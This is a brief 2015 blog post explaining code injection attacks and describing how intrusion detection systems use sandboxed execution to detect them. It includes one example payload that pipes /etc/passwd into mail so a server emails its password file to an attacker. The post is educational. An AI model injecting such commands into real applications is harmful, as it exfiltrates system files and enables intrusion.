A code injection attack is similar to an SQL injection attack. In this attack, when a user sends any application to the server, an attacker hacks the application and adds malicious code, such as shell commands or PHP scripts. When the server receives the request, it executes that application.
The main goal of this attack is to bypass or modify the original program in order to execute arbitrary code and gain access to restricted Web sites or databases, including those with personal information such as credit card numbers and passwords.
For example, consider that the server has a “Guestbook” script, and the user sends short messages to the server, such as:
This site is great!
An attacker could insert code into the Guestbook message, such as:
cat /etc/passwd | mail firstname.lastname@example.org
This would make the server execute this code and e-mail the password file to the attacker.
Investigating Code Injection Attacks
Intrusion detection systems (IDS) and a series of sandbox execution environments provided by the OS detect code injection attacks. When the IDS finds a series of executable instructions in the network traffic, it transfers the suspicious packets’ payload to the execution environment matching the packets’ destination. The proper execution environment is determined with the help of the destination IP address of the incoming packets. The packet payload is then executed in the corresponding monitored environment, and a report of the payload’s OS resource usage is passed to the IDS. If the report contains evidence of OS resource usage, the IDS alerts the user that the incoming packet contains malicious data.
Published on Mon 02 March 2015 by Hatty Jenkins in Security with tag(s): code injection